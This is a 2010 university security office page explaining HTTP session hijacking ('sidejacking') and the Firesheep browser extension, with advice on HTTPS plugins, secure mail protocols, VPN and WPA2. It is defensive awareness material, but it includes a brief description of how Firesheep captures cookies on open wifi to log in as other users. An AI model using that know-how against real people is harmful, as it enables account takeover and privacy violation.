Loyola University Chicago

- Navigation -

Loyola University Chicago

University Information Security Office

Firesheep and Sidejacking



Firesheep update 11-15-2010:

 

-GMAIL and Amazon have since fixed the security of their website and are no longer affected by this exploit. 

-Hotmail has enabled users the option to turn on HTTPS for hotmail accounts.  To enable this for your account click here.

 

 

What is sidejacking?

 

When logging into a website you usually start by submitting your username and password. The server then checks to see if an account matching this information exists and if so, replies back to you with a "cookie" which is used by your browser for all subsequent requests.

 

It's extremely common for websites to protect your password by encrypting the initial login, but surprisingly uncommon for websites to encrypt everything else. This leaves the cookie (and the user) vulnerable. HTTP session hijacking (sometimes called "sidejacking") is when an attacker gets a hold of a user's cookie, allowing them to do anything the user can do on a particular website. On an open wireless network, cookies are basically shouted through the air, making these attacks extremely easy.

 

This is a widely known problem that has been talked about to death, yet very popular websites continue to fail at protecting their users. The only effective fix for this problem is full end-to-end encryption, known on the web as HTTPS or SSL. Facebook is constantly rolling out new "privacy" features in an endless attempt to quell the screams of unhappy users, but what's the point when someone can just take over an account entirely? Twitter forced all third party developers to use OAuth then immediately released (and promoted) a new version of their insecure website. When it comes to user privacy, SSL is the elephant in the room.

 

What is Firesheep?

 

A Firefox extension designed to demonstrate Sidejacking.

 

How can users protect themselves against Firesheep?

 

• Several plugins exist for Firefox that force all web connections to secure websites (HTTPS), if the website supports HTTPS. This will ensure that the connection “stays” secured, even after you log in. ITS recommends using Force TLS or HTTPS Everywhere with Firefox.  These plugins will protect you from prying eyes while on Loyola’s network. For more information, go to Browser Safety: http://luc.edu/uiso/security_tools.shtml 

 

• Use secure networking services over unsecured wireless connections.  Utilizing POP and IMAP with you email client can leave you exposed.  Make sure you are using their secure alternative:  POPS and IMAPS.  Downloading files via FTP is done in the clear.  If your data is sensitive, make sure to use FTPS or SFTP.  All of these protocols send sensitive authentication data (such as your username and password) in cleartext.  If you utilize these services on an unsecure wireless connection they could be compromised.  

 

• To use the secure alternative of IMAP (IMAPS) with Loyola’s network please visit http://www.luc.edu/its/email_imap.shtml.

 

• If you have access to the LUC VPN you can leverage the security provided by the encrypted network access to secure all Internet traffic from prying eyes.  Any website, email server or FTP site you access via the VPN will be protected.

 

• Use a secured wireless network, such as a network encrypted with WPA or WPA2.  All Internet traffic (such as web, email and FTP services) will be secured from compromise if you leverage wireless encryption. 

 

• NOTE:  Do not use WEP encryption with your wireless access points.  WEP can be cracked in less than a minute leading to data compromise.

 

How it works ?

 

After installing the extension you'll see a new sidebar. Connect to any busy open wifi network and click the big "Start Capturing" button. Then wait.

As soon as anyone on the network visits an insecure website known to Firesheep, their name and photo will be displayed:

 Double-click on someone, and you're instantly logged in as them.

That's it. Firesheep is free, open source, and is available now for Mac OS X and Windows. Linux support is on the way.

 

Frequently Asked Questions

 

 

 

 

 

 

 

 

 

 

 

 

 

 



Loyola

Information Technology Services
1032 W. Sheridan Ave. · Chicago, IL 60660 · 773.508-7373
DataSecurity@luc.edu

Notice of Non-discriminatory Policy